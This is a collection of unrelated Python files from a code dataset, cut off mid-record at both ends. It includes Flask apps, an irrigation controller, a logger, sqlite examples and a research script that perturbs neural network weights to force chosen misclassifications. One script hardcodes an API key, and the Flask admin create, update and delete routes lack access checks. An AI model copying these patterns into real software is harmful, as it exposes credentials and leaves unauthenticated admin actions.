set_logging(level=logging.DEBUG)\n logger.debug(\"logging set to DEBUG\")\n\n elif ctx.obj.verbose:\n set_logging(level=logging.INFO,\n format=\"%(message)s\")\n logger.debug(\"logging set to INFO\")\n\n\n@click.command(\"version\")\ndef version():\n \"\"\"Display the version.\"\"\"\n click.echo(packit.__version__)\n\n\npackit_base.add_command(sg2dg)\npackit_base.add_command(sg2srpm)\npackit_base.add_command(watcher)\npackit_base.add_command(version)\npackit_base.add_command(watch_pr)\n\nif __name__ == '__main__':\n packit_base()\n","sub_path":"packit/cli/packit_base.py","file_name":"packit_base.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"644585221","text":"#!/usr/bin/python\n#\n# Copyright 2018 Jigsaw Operations LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport argparse\nimport asyncio\nimport ipaddress\nimport pprint\nimport socket\nimport sys\n\nimport netanalysis.analysis.simple_autonomous_system as sas\nfrom 
netanalysis.dns import domain_ip_validator\nimport netanalysis.model.autonomous_system as model\n\ndef resolve_ip(ip) -> str:\n try:\n return socket.gethostbyaddr(ip.compressed)[0]\n except socket.herror:\n return None\n\ndef main(args):\n ip_address = args.ip_address[0]\n as_repo = sas.create_default_as_repo() # type: model.AsRepository\n asys = as_repo.get_as_for_ip(ip_address) # type: model.AutonomousSystem\n print(\"ASN: %d (%s)\" % (asys.id, asys.name))\n # AS Type is experimental and based on outdated data.\n print(\"Type: %s\" % asys.type.name)\n print(\"Org: %s (country: %s, name: %s)\" % (asys.org.id, asys.org.country, asys.org.name))\n if ip_address.is_global:\n hostname = resolve_ip(ip_address)\n if hostname:\n print(\"Hostname: %s\" % hostname)\n else:\n print(\"IP is not global\")\n validator = domain_ip_validator.DomainIpValidator()\n try:\n cert = asyncio.get_event_loop().run_until_complete(validator.get_cert(None, ip_address))\n if cert:\n print(\"TLS Certificate:\\n%s\" % pprint.pformat(cert, width=100, compact=True))\n except Exception as e:\n print(\"TLS Certificate: %s\" % repr(e))\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description='Gets information about the given IP address')\n parser.add_argument('ip_address', type=ipaddress.ip_address,\n nargs=1, help='The IP address to get information for')\n sys.exit(main(parser.parse_args()))\n","sub_path":"netanalysis/analysis/ip_info.py","file_name":"ip_info.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"268336487","text":"# coding:utf-8\n\nfrom flask import Blueprint, request, render_template\nfrom flask_user import roles_required\nfrom ...helpers.flask_helper import json_response\nfrom ...models import Pattern\nfrom ...services import pattern_service\n\nbp = Blueprint('admin_patterns', __name__, url_prefix='/admin/patterns')\n\n\n@bp.route('/', methods=['GET'])\n@roles_required('admin')\ndef home_page():\n return render_template('backend/patternsMgr.html')\n\n\n@bp.route('/list', methods=['GET'])\ndef list_pattern():\n limit = int(request.args.get('iDisplayLength', '10'))\n offset = int(request.args.get('iDisplayStart', '0'))\n sEcho = request.args.get('sEcho')\n name = request.args.get('name', None)\n count, patterns = pattern_service.paginate_pattern(offset, limit, name=name)\n return json_response(sEcho=sEcho, iTotalRecords=count, iTotalDisplayRecords=count, aaData=patterns)\n\n\n@bp.route('/create', methods=['GET'])\n@bp.route('/<int:pattern_id>/update', methods=['GET'])\ndef create_or_update_pattern_page(pattern_id=None):\n if pattern_id:\n pattern = Pattern.from_cache_by_id(pattern_id)\n else:\n pattern = {}\n\n return render_template('backend/patternUpdate.html', pattern=pattern)\n\n\n@bp.route('/create', methods=['POST'])\ndef create_pattern():\n pattern = pattern_service.create_pattern(**request.json)\n return json_response(pattern=pattern)\n\n\n@bp.route('/<int:pattern_id>/update', methods=['POST'])\ndef update_pattern(pattern_id):\n pattern = pattern_service.update_pattern(pattern_id, **request.json)\n return json_response(pattern=pattern)\n\n\n@bp.route('/<int:pattern_id>/delete', methods=['POST'])\ndef delete_pattern(pattern_id):\n pattern_service.delete_pattern(pattern_id)\n return json_response(success=True)\n\n\n@bp.route('/<int:pattern_id>', methods=['GET'])\ndef get_pattern(pattern_id):\n pattern = Pattern.from_cache_by_id(pattern_id)\n return 
json_response(pattern=pattern)\n","sub_path":"web_app/frontend/admin/patterns.py","file_name":"patterns.py","file_ext":"py","file_size_in_byte":1917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"332273705","text":"from os import write\nimport urllib\nimport json\nimport pprint\nimport urllib.request\nfrom datetime import date\nimport time\napi = \"http://api.openweathermap.org/data/2.5/forecast?id=524901&appid=0b7c4978dda884bbfb0397d03033509f\"\nsapi = \"http://api.openweathermap.org/data/2.5/forecast/daily?zip=94032&appid=0b7c4978dda884bbfb0397d03033509f\" \n\nsaapi = \"http://api.openweathermap.org/data/2.5/weather?q=Passau&appid=0b7c4978dda884bbfb0397d03033509f\"\n\nsensor_state = {\n \"Analog_Rain\": 1,\n \"Digital_Rain\": 1,\n \"Temp\": 1,\n \"Soil_Moisture\": 1,\n}\n\ndef getDate():\n today = date.today()\n d1 = today.strftime(\"%d/%m/%Y\")\n return d1\n\nirrigation_state = {\n \"irrgatedToday\" : False,\n \"date\": getDate()\n}\n\n\n# Reading Sensor data \nwith open(\"sensors.json\") as jsonFile:\n jsonObject = json.load(jsonFile)\n jsonFile.close()\n\ncurrentSensorvalues = jsonObject[0]\nlastMoistureValue = {\n\n}\nif(currentSensorvalues['Soil_Moisture'] <= 1200):\n lastRecordedMoistureValue = currentSensorvalues['Soil_Moisture']\n lastRecordedTime =timestamp = int(time.time()*1000.0)\n lastMoistureValue['Soil_Moisture'] = lastRecordedMoistureValue\n lastMoistureValue['time'] = lastRecordedTime\n\n\nprint(\"Current sensor values\")\nprint(currentSensorvalues)\nprint(\"\\n\")\n\n\ndef saveState():\n \n with open(\"sensors_state.json\", \"w\") as f: \n json.dump(sensor_state, f)\n f.close()\n\n\ndef showWarnings():\n print(\"\\n\")\n print(\"Sensors have failed and could not fetch data from cloud\")\n exit(1)\n\ndef getCurrentWeatherConditions():\n response = urllib.request.urlopen(saapi)\n output = response.read().decode('utf-8')\n return json.loads(output)\n\ndef irrigate(time):\n print(\"Current Sensor state\")\n print(sensor_state)\n print(\"\\n\\n\")\n print(\"------------Determined irrigation--------------\")\n print(\"Irrgating for \"+ str(time) + \" minutes\")\n irrgatedToday = True\n saveState()\n \n\ndef doNotIrrigate(time):\n print(\"Current Sensor state\")\n print(sensor_state)\n print(\"\\n\\n\")\n print(\"------------Determined irrigation--------------\")\n print(\"No need to irrigate now\")\n saveState()\n\n\ndef getEstimatedMoisture():\n # decreases in time , check the last recorded value\n currentTemperature = currentSensorvalues['Temperature']\n currentTimestamp = int(time.time()*1000.0)\n difference = currentTimestamp - lastMoistureValue['time']\n moist = currentSensorvalues['Soil_Moisture'] - ((difference/1000) * currentTemperature)\n return moist\n\ndef controlLogic():\n\n # Fix missing sensor data with api\n try:\n cloud_data = getCurrentWeatherConditions()\n except:\n cloud_data = \"Unable to fetch\"\n # pprint.pprint(cloud_data)\n if(currentSensorvalues['Soil_Moisture'] == 9999):\n print(\"WARNING..Soil_Moisture sensor has failed\")\n\n # currentSensorvalues['Soil_Moisture'] = getEstimatedMoisture()\n # print(\"estimated moisture\")\n # print(currentSensorvalues['Soil_Moisture'])\n sensor_state['Soil_Moisture'] = 0\n\n \n if ( currentSensorvalues['Digital_Rain'] == 9999 or currentSensorvalues['Analog_Rain'] == 9999):\n print(\"WARNING.. Using data from the cloud. 
Rain sensor has failed\")\n sensor_state['Digital_Rain'] = 0\n sensor_state['Analog_Rain'] = 0\n if(cloud_data == 'Unable to fetch'):\n return showWarnings() \n\n if(cloud_data['weather'][0]['main']=='Rain' or cloud_data['weather'][0]['main']=='Light rain'):\n \n currentSensorvalues['Digital_Rain'] = 1\n print(currentSensorvalues)\n currentSensorvalues['Analog_Rain'] = 2500\n \n\n else:\n currentSensorvalues['Digital_Rain'] = 0\n currentSensorvalues['Analog_Rain'] = 4000\n\n\n \n if( currentSensorvalues['Soil_Moisture'] <300 and (currentSensorvalues['Analog_Rain']>3000 and currentSensorvalues['Analog_Rain']<4500)):\n irrigate(5)\n \n else:\n doNotIrrigate(5)\n\n\n\n\ncontrolLogic()\n\n\n\n\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"325520765","text":"from logging import LogRecord\nfrom typing import Optional\n\nfrom six import string_types\n\nimport frappe\nimport uuid\nimport logging\nimport zlib\nfrom socket import gethostname\nfrom logging.handlers import RotatingFileHandler\nfrom pygelf import GelfUdpHandler\nfrom frappe.model.document import Document\nfrom latte.json import dumps_binary, loads\nfrom traceback import walk_stack\nfrom frappe import local\n\nclass CustomAttributes(logging.Filter):\n\t__slots__ = [\n\t\t'__modulename',\n\t\t'__index_name',\n\t\t'__storage_key',\n\t]\n\tdef __init__(self, *args, modulename=None, index_name=None, storage_key=None, **kwargs):\n\t\tself.__modulename = modulename\n\t\tself.__index_name = index_name\n\t\tself.__storage_key = storage_key\n\t\tsuper().__init__(*args, **kwargs)\n\n\tdef filter(self, record):\n\t\tmessage = enrich(record.msg)\n\n\t\tmessage['module'] = self.__modulename\n\t\tmessage['index_name'] = self.__index_name\n\t\tmessage['storage_key'] = self.__storage_key\n\t\tmessage['timestamp'] = record.created\n\t\tmessage['host'] = gethostname()\n\n\t\tif isinstance(message, frappe._dict):\n\t\t\tmessage = dict(message)\n\n\t\trecord.msg = dumps_binary(message)\n\n\t\treturn True\n\ndef enrich(logged_msg):\n\tif isinstance(logged_msg, dict):\n\t\tmessage = logged_msg\n\telif isinstance(logged_msg, Document):\n\t\tmessage = logged_msg.as_dict()\n\telse:\n\t\tmessage = {'info': logged_msg}\n\n\tflags = local.flags\n\n\tflags.request_id_number = (flags.request_id_number or 0) + 1\n\n\trequest_id = flags.request_id\n\n\tif not request_id:\n\t\trequest_id = flags.request_id = str(uuid.uuid4())\n\n\tif 'request_id' not in message:\n\t\tmessage['request_id'] = request_id\n\n\tif 'task_id' not in message:\n\t\tmessage['task_id'] = flags.task_id\n\n\tif 'runner_type' not in message:\n\t\tmessage['runner_type'] = flags.runner_type\n\n\tmessage['log_number'] = flags.request_id_number\n\tmessage['site'] = getattr(local, 'site', None)\n\n\tif 'user' not in message:\n\t\tmessage['user'] = frappe.session.user\n\tif 'log_identity' not in message:\n\t\tmessage['log_identity'] = flags.log_identity\n\tif 'method' not in message:\n\t\tmessage['method'] = flags.current_running_method\n\n\treturn message\n\ndef get_logger(module=None, with_more_info=False, index_name=None):\n\tif module is None:\n\t\tframe = next(walk_stack(None))[0]\n\t\tmodule = f'{frame.f_code.co_filename} | {frame.f_code.co_name}'\n\n\tstorage_key = f'{module}_{index_name or \"default\"}'\n\ttry:\n\t\treturn frappe.loggers[storage_key]\n\texcept KeyError:\n\t\tpass\n\n\tlogger = 
logging.getLogger(storage_key)\n\tfrappe.loggers[storage_key] = logger\n\n\tif getattr(logger, '__patched', None):\n\t\treturn logger\n\t#logger.__patched = True\n\n\tlogger_type = local.conf.logger_type\n\t# logger.addFilter(CustomAttributes(\n\t# \tmodulename=module,\n\t# \tindex_name=index_name or 'default',\n\t# \tstorage_key=storage_key,\n\t# ))\n\n\thandler = None\n\tif logger_type != 'file':\n\t\thandler = get_gelf_handler()\n\t\tlogger.addFilter(CustomAttributes(\n\t\t\t\tmodulename=module,\n\t\t\t\tindex_name=index_name or 'default',\n\t\t\t\tstorage_key=storage_key,\n\t\t))\n\tif not handler:\n\t\tformatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')\n\t\thandler = RotatingFileHandler(\n\t\t\t\tlocal.conf.logfile or '../logs/frappe.log',\n\t\t\tmaxBytes=100 * 1024 * 1024,\n\t\t\tbackupCount=10,\n\t\t)\n\t\thandler.setFormatter(formatter)\n\n\tlogger.addHandler(handler)\n\tlogging_level = local.conf.logging_level or logging.INFO\n\tif str(logging_level).isnumeric():\n\t\tlogging_level = int(logging_level)\n\tlogger.setLevel(logging_level)\n\tlogger.propagate = True\n\tlogger.__patched = True\n\treturn logger\n\n\ndef get_gelf_handler():\n\tgelf_config = local.conf.gelf_config\n\tif not gelf_config:\n\t\treturn\n\n\tgelf_gelf_host = gelf_config.get('host', '127.0.0.1')\n\tgelf_gelf_port = gelf_config.get('port', 32000)\n\treturn CustomGelfUdpHandler(host=gelf_gelf_host, port=gelf_gelf_port, include_extra_fields=True)\n\nclass CustomGelfUdpHandler(GelfUdpHandler):\n\tdef convert_record_to_gelf(self, record):\n\t\treturn zlib.compress(record.msg)\n\n\n# class DictMessageFormatter(logging.Formatter):\n#\n# \tdef __init__(self, fmt: Optional[str] = ..., ) -> None:\n# \t\tsuper().__init__(fmt, validate=False)\n#\n# \tdef formatMessage(self, record: LogRecord) -> str:\n# \t\tmsg = record.msg\n# \t\tif msg:\n# \t\t\tif isinstance(msg, dict):\n# \t\t\t\tmsg_dict = msg\n# \t\t\telif isinstance(msg, string_types):\n# \t\t\t\ttry:\n# \t\t\t\t\tmsg_dict = loads(msg)\n# \t\t\t\texcept:\n# \t\t\t\t\tmsg_dict = {\"message\": msg}\n# \t\t\telse:\n# \t\t\t\tmsg_dict: {\"message\": msg}\n#\n# \t\t\tif not msg_dict.get(\"method\", None):\n# \t\t\t\tmsg_dict.update({\"method\": \"\"})\n# \t\t\tif not msg_dict.get(\"info\", None):\n# \t\t\t\tmsg_dict.update({\"info\": \"\"})\n# \t\t\tif record.args:\n# \t\t\t\trecord.args.update(msg_dict)\n# \t\t\telse:\n# \t\t\t\trecord.args = msg_dict\n# \t\t\tprint(f\"##### Record Args - {record.args}\")\n# \t\treturn super(DictMessageFormatter, self).formatMessage(record)\n","sub_path":"latte/utils/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":4730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"504515093","text":"## l2_attack.py -- attack a network optimizing for l_2 distance\n##\n## Copyright (C) 2016, Nicholas Carlini .\n##\n## This program is licenced under the BSD 2-Clause licence,\n## contained in the LICENCE file in this directory.\n\nimport sys\nimport tensorflow as tf\nimport numpy as np\nfrom numpy import linalg as LA\n\nBINARY_SEARCH_STEPS = 30 # number of times to adjust the constant with binary search\nMAX_ITERATIONS = 10000 # number of iterations to perform gradient descent\nABORT_EARLY = True # if we stop improving, abort gradient descent early\nLEARNING_RATE = 1e-2 # larger values converge faster to less accurate results\nTARGETED = True # should we target one specific class? 
or just be wrong?\nCONFIDENCE = 0 # how strong the adversarial example should be\nINITIAL_CONST = 1e-3 # the initial constant c to pick as a first guess\nRO = 20\nLAYERNUMBER=15\nUSEKERNEL=True\nKERNELBIAS=True\nSS = 10\n\nclass LADMML2re:\n def __init__(self, sess, model, batch_size=1, confidence=CONFIDENCE, layernum=LAYERNUMBER,\n targeted=TARGETED, learning_rate=LEARNING_RATE, s=SS,\n binary_search_steps=BINARY_SEARCH_STEPS, max_iterations=MAX_ITERATIONS,\n abort_early=ABORT_EARLY, ro=RO, use_kernel=USEKERNEL, kernel_bias=KERNELBIAS):\n \"\"\"\n The L_2 optimized attack.\n\n This attack is the most efficient and should be used as the primary\n attack to evaluate potential defenses.\n\n Returns adversarial examples for the supplied model.\n\n confidence: Confidence of adversarial examples: higher produces examples\n that are farther away, but more strongly classified as adversarial.\n batch_size: Number of attacks to run simultaneously.\n targeted: True if we should perform a targetted attack, False otherwise.\n learning_rate: The learning rate for the attack algorithm. Smaller values\n produce better results but are slower to converge.\n binary_search_steps: The number of times we perform binary search to\n find the optimal tradeoff-constant between distance and confidence.\n max_iterations: The maximum number of iterations. Larger values are more\n accurate; setting too small will require a large learning rate and will\n produce poor results.\n abort_early: If true, allows early aborts if gradient descent gets stuck.\n initial_const: The initial tradeoff-constant to use to tune the relative\n importance of distance and confidence. If binary_search_steps is large,\n the initial constant is not important.\n boxmin: Minimum pixel value (default -0.5).\n boxmax: Maximum pixel value (default 0.5).\n \"\"\"\n\n self.model = model\n self.sess = sess\n self.TARGETED = targeted\n self.LEARNING_RATE = learning_rate\n self.MAX_ITERATIONS = max_iterations\n self.BINARY_SEARCH_STEPS = binary_search_steps\n self.ABORT_EARLY = abort_early\n self.CONFIDENCE = confidence\n self.batch_size = batch_size\n self.use_kernel = use_kernel\n self.ro = ro\n self.s = s\n self.layernum = layernum\n self.kernel_bias = kernel_bias\n self.grad = self.gradient_descent(sess, model)\n\n def compare(self, x, y):\n if not isinstance(x, (float, int, np.int64)):\n x = np.copy(x)\n if self.TARGETED:\n x[y] -= self.CONFIDENCE\n else:\n x[y] += self.CONFIDENCE\n x = np.argmax(x)\n if self.TARGETED:\n return x == y\n else:\n return x != y\n\n def gradient_descent(self, sess, model):\n\n batch_size = self.batch_size\n shape = (batch_size, model.image_size, model.image_size, model.num_channels)\n\n timg = tf.Variable(np.zeros(shape), dtype=tf.float32)\n tlab = tf.Variable(np.zeros((batch_size, model.num_labels)), dtype=tf.float32)\n # and here's what we use to assign them\n assign_timg = tf.placeholder(tf.float32, shape)\n assign_tlab = tf.placeholder(tf.float32, (batch_size, model.num_labels))\n\n if not self.kernel_bias:\n\n if self.use_kernel:\n aaa = model.model.layers[self.layernum].kernel\n else:\n aaa = model.model.layers[self.layernum].bias\n\n tdelt = tf.Variable(np.zeros(aaa.shape, dtype=np.float32))\n assign_tdelt = tf.placeholder(tf.float32, aaa.shape)\n\n if self.use_kernel:\n model.model.layers[self.layernum].kernel = tdelt + model.model.layers[self.layernum].kernel\n bbb = model.model.layers[self.layernum].kernel\n else:\n model.model.layers[self.layernum].bias = tdelt + model.model.layers[self.layernum].bias\n 
bbb = model.model.layers[self.layernum].bias\n\n else:\n aaa = model.model.layers[self.layernum].kernel\n aaa2 = model.model.layers[self.layernum].bias\n\n tdelt_kernel = tf.Variable(np.zeros(aaa.shape, dtype=np.float32))\n assign_tdelt_kernel = tf.placeholder(tf.float32, aaa.shape)\n tdelt_bias = tf.Variable(np.zeros(aaa2.shape, dtype=np.float32))\n assign_tdelt_bias = tf.placeholder(tf.float32, aaa2.shape)\n\n model.model.layers[self.layernum].kernel = tdelt_kernel + model.model.layers[self.layernum].kernel\n model.model.layers[self.layernum].bias = tdelt_bias + model.model.layers[self.layernum].bias\n bbb = model.model.layers[self.layernum].kernel\n bbb2 = model.model.layers[self.layernum].bias\n\n output = model.predict(timg)\n l2dist_real = tf.reduce_sum(tf.square(tdelt_kernel)) + tf.reduce_sum(tf.square(tdelt_bias))\n l2dist_real = tf.sqrt(l2dist_real)\n real = tf.reduce_sum(tlab * output, 1)\n other = tf.reduce_max((1 - tlab) * output - (tlab * 10000), 1)\n\n if self.TARGETED:\n # if targetted, optimize for making the other class most likely\n loss1 = tf.maximum(0.0, other - real + self.CONFIDENCE)\n else:\n # if untargeted, optimize for making this class least likely.\n loss1 = tf.maximum(0.0, real - other + self.CONFIDENCE)\n\n wei = np.ones(batch_size)\n wei[0:self.s] = 1000.0 * wei[0:self.s]\n loss1 = loss1 * wei\n loss1 = 0.5 * tf.reduce_sum(loss1)\n\n grad_tdelt_kernel, grad_tdelt_bias = tf.gradients(loss1, [tdelt_kernel, tdelt_bias])\n\n # model.model.layers[13].kernel = model.model.layers[13].kernel - tdelt\n if not self.kernel_bias:\n if self.use_kernel:\n model.model.layers[self.layernum].kernel = aaa\n ccc = model.model.layers[self.layernum].kernel\n else:\n model.model.layers[self.layernum].bias = aaa\n ccc = model.model.layers[self.layernum].bias\n else:\n model.model.layers[self.layernum].kernel = aaa\n model.model.layers[self.layernum].bias = aaa2\n\n ccc = model.model.layers[self.layernum].kernel\n ccc2 = model.model.layers[self.layernum].bias\n\n # these are the variables to initialize when we run\n setup = []\n setup.append(timg.assign(assign_timg))\n setup.append(tlab.assign(assign_tlab))\n setup.append(tdelt_kernel.assign(assign_tdelt_kernel))\n setup.append(tdelt_bias.assign(assign_tdelt_bias))\n\n def doit(imgs, labs, z):\n\n batch = imgs[:batch_size]\n batchlab = labs[:batch_size]\n akernel = model.model.layers[self.layernum].kernel\n abias = model.model.layers[self.layernum].bias\n z1 = z[0: akernel.shape[0] * akernel.shape[1]]\n z2 = z[akernel.shape[0] * akernel.shape[1]:]\n z1 = np.reshape(z1, akernel.shape)\n z2 = np.reshape(z2, abias.shape)\n\n sess.run(setup, {assign_timg: batch, assign_tlab: batchlab, assign_tdelt_kernel: z1, assign_tdelt_bias:z2})\n aaaa, bbbb, cccc = sess.run([aaa, bbb, ccc])\n # print(LA.norm(aaaa - bbbb))\n # print(LA.norm(aaaa - cccc))\n scores, l2dist, delt_grad_kernel, delt_grad_bias = sess.run([output, l2dist_real,\n grad_tdelt_kernel, grad_tdelt_bias])\n\n delt_gradss = np.hstack((np.reshape(delt_grad_kernel, (-1)), np.reshape(delt_grad_bias, (-1))))\n return scores, l2dist, np.array(delt_gradss)\n\n return doit\n\n def attack(self, imgs, targets):\n \"\"\"\n Perform the L_2 attack on the given images for the given targets.\n\n If self.targeted is true, then the targets represents the target labels.\n If self.targeted is false, then targets are the original class labels.\n \"\"\"\n r = []\n print('go up to', len(imgs))\n for i in range(0, len(imgs), self.batch_size):\n print('tick', i)\n r.extend(self.attack_batch(imgs[i:i + 
self.batch_size], targets[i:i + self.batch_size]))\n return np.array(r)\n\n def attack_batch(self, imgs, labs):\n \"\"\"\n Run the attack on a batch of images and labels.\n \"\"\"\n batch_size = self.batch_size\n if self.kernel_bias:\n aab = self.model.model.layers[self.layernum].kernel\n aab2 = self.model.model.layers[self.layernum].bias\n\n o_bestl2 = 1e10\n o_bestattack = 0.0 * np.ones(aab.shape[0]*aab.shape[1] + aab2.shape[0])\n o_successrate = 0.0\n\n delt = 0.0 * np.ones(aab.shape[0]*aab.shape[1] + aab2.shape[0])\n s = 0.0 * np.ones(aab.shape[0]*aab.shape[1] + aab2.shape[0])\n\n alpha = 20\n for outer_step in range(self.BINARY_SEARCH_STEPS):\n print(outer_step, o_bestl2)\n\n temp = delt - s\n# z = np.where(np.abs(temp) ** 2 < (2.0 / self.ro), 0, temp)\n z = self.ro/(2.0 + self.ro) * temp\n\n scor, _, delt_grads = self.grad(imgs, labs, delt)\n\n eta = 1/np.sqrt(outer_step+1)\n delt = 1/(alpha / eta * imgs.shape[0] + self.ro) * \\\n ( self.ro * (z + s) + alpha / eta * imgs.shape[0] * delt - delt_grads)\n\n scores, l2, _ = self.grad(imgs, labs, delt)\n s = s + z - delt\n\n score_count = []\n for e, (sc) in enumerate(scores):\n # if e < self.s:\n if self.compare(sc, np.argmax(labs[e])):\n score_count.append(1)\n else:\n score_count.append(0)\n\n successrate = np.mean(score_count)\n\n print(successrate)\n print(l2)\n if successrate >= o_successrate:\n o_successrate = successrate\n l0s = np.count_nonzero(delt)\n o_bestl2 = l0s\n o_bestattack = delt\n scores_backup = scores\n\n return o_bestattack\n","sub_path":"l2_sidechannel_attack_v5.py","file_name":"l2_sidechannel_attack_v5.py","file_ext":"py","file_size_in_byte":10958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"180208269","text":"# -*- coding: utf-8 -*-\n\nfrom flask import Flask, request, Response\nimport csv\nimport json\nimport os\nimport re\nimport requests\n\nimport sys\nreload(sys)\nsys.setdefaultencoding(\"utf-8\")\n\napp = Flask(__name__)\n\n@app.route(\"//\")\ndef dump(doc_id):\n\n CSV_URL = \"http://docs.google.com/feeds/download/spreadsheets/Export?key=%s&exportFormat=csv&gid=0\" % doc_id\n csv_file = requests.get(CSV_URL).text\n\n fields_row = int(request.args.get('fields_row', 0))\n\n fields = [re.sub(r'\\W+', '_', field.lower()) for field in csv_file.split(\"\\r\\n\")[fields_row].split(\",\")]\n reader = csv.DictReader(csv_file.split(\"\\r\\n\")[fields_row+1:], fields)\n \n response_body = json.dumps([row for row in reader])\n\n response = Response(response_body)\n response.headers['Content-type'] = 'text/json'\n\n return response\n\nif __name__ == \"__main__\":\n port = int(os.environ.get(\"PORT\", 5000))\n app.debug = port == 5000\n app.run(host='0.0.0.0', port=port)","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"139906282","text":"# 데이터 베이스 연결하기\nimport sqlite3\n\nfilepath = \"./sql/text2.sqlite\"\nconn = sqlite3.connect(filepath)\n\n# 테이블 생성하기\ncur = conn.cursor()\n# 만약 items라는 테이블이 존재하면 지우라.\ncur.execute(\"DROP TABLE IF EXISTS items\")\ncur.execute(\"\"\"\n CREATE TABLE items(\n item_id INTEGER PRIMARY KEY,\n name TEXT,\n price INTEGER)\"\"\")\nconn.commit()\n\n# 데이터 넣기\n# cursor.execute()\ncur = conn.cursor()\ncur.execute(\"INSERT INTO items (name,price) VALUES(?,?)\", (\"Orange\",5200))\nconn.commit()\n\n# 여러데이터 연속으로 넣기\n# cursor.executemany()\ncur = conn.cursor()\ndata = [(\"Mango\",7700), (\"Kiwi\",4000), 
(\"Grape\",8000),(\"Peach\",9400),(\"Persimmon\",7000),(\"Banana\", 4000)]\ncur.executemany(\"INSERT INTO items (name,price) VALUES(?,?)\", data)\nconn.commit()\n\n# 4000-7000원 사이의 데이터 추출하기\n# insert하는 것 처럼 ?에 들어갈 수치를 변수로 지정해놓고\n# cursor.execute()로 쿼리문을 만들어준다.\ncur = conn.cursor()\nprice_range = (4000, 7000)\ncur.execute(\"SELECT * FROM items WHERE price >=? AND price <=?\",price_range)\n\n# cursor.fetchall()로 쿼리문의 결과에 대해 모두 출력 하게 한다.\nfr_list = cur.fetchall()\nfor fr in fr_list:\n print(fr)","sub_path":"crawling_db/sqlite_5.py","file_name":"sqlite_5.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"253259220","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport getopt\nimport sys\n\nfrom PIL import Image\n\n\ndef noising(input_filename, output_filename):\n input_image = Image.open(input_filename)\n input_image.save(output_filename, quality=100)\n pass\n\n\ndef main(args):\n input_filename = None\n output_filename = None\n\n # print('ARGV :', sys.argv[1:])\n\n options, remainder = getopt.getopt(\n sys.argv[1:], 'i:o:v',\n ['input', 'output='])\n # print('OPTIONS :', options)\n\n for opt, arg in options:\n if opt in ('-i', '--input'):\n input_filename = arg\n elif opt in ('-o', '--output'):\n output_filename = arg\n\n print('INPUT :', input_filename)\n print('OUTPUT :', output_filename)\n print('REMAINING :', remainder)\n\n if input_filename and output_filename:\n noising(input_filename, output_filename)\n else:\n print('input_filename or output_filename are None')\n\n return 0\n\n\nif __name__ == '__main__':\n import sys\n sys.exit(main(sys.argv))\n","sub_path":"watermarking/static/watermarking/noise.py","file_name":"noise.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"533567012","text":"import time\r\n#import pymsgbox\r\nimport easygui\r\n\r\nprint(\"What do you want to get reminded\")\r\ntext = str(input())\r\n\r\nprint(\"In how many minutes do you want to get reminded?\")\r\ntimer = float(input())\r\nprint(\"The timer is set is\", timer, \"minute(s)\")\r\ntimer = timer *60\r\ntime.sleep(timer)\r\nprint(\"This is time for\", text)\r\n#pymsgbox.alert('ScrumPost!', 'Alert')\r\n#response = pymsgbox.prompt('Done?Click Ok')\r\neasygui.msgbox(\"Reminder Msg for SCRUM POST!\", title=\"ScrumPost\")","sub_path":"example_pgms/real_apps/timely_reminder.py","file_name":"timely_reminder.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"485267582","text":"'''\nCreated on Jan 2, 2017\n\n@author: Chris\n'''\n\nfrom Tkinter import *\nfrom Tkinter import Frame\n\nfrom ttk import Treeview\nfrom ttk import Notebook\nimport os\n\n\nimport logging as log\n\nfrom src.questrade.classes import market\nimport src.questrade.classes.account as Account\nfrom src.questrade.classes.token import Token\nfrom src.questrade.enums import dictionary as qtD\n\nuserpath = os.getenv(\"HOME\")\nfullpath = userpath + '/' + 'test.log'\nlog.basicConfig(filename=(fullpath), format='%(asctime)s - %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')\nlog.warning('----------Start of CLASSTEST')\n\nsymbolIdList = []\n\nsymbols =['AGU.TO','MX.TO','IT.TO']\nprint(symbols)\nsymbolInfo = market.Symbol(symbols)\nfor symbol in symbolInfo.symbolList:\n print(str(symbol))\n symbolIdList.append(str(symbol[qtD.Symbols.symbolId]))\n 
